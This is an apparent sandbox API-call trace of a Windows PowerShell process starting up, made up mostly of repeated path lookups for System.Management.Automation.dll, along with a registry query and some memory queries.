	[0232.159] RegQueryValueExW (in: hKey=0x344, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ada4c, lpData=0x1b368cf0, lpcbData=0x1ada48*=0x56 | out: lpType=0x1ada4c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ada48*=0x56) returned 0x0
	[0232.159] CoTaskMemFree (pv=0x1b368cf0) 
	[0232.160] RegCloseKey (hKey=0x344) returned 0x0
	[0232.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.168] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0232.168] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0232.168] CoTaskMemFree (pv=0x204160) 
	[0232.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0232.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0236.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.650] VirtualQuery (in: lpAddress=0x1abb50, lpBuffer=0x1aca10, dwLength=0x30 | out: lpBuffer=0x1aca10*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0245.654] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0245.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0245.654] CoTaskMemFree (pv=0x204160) 
	[0245.976] VirtualQuery (in: lpAddress=0x1abb50, lpBuffer=0x1aca10, dwLength=0x30 | out: lpBuffer=0x1aca10*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
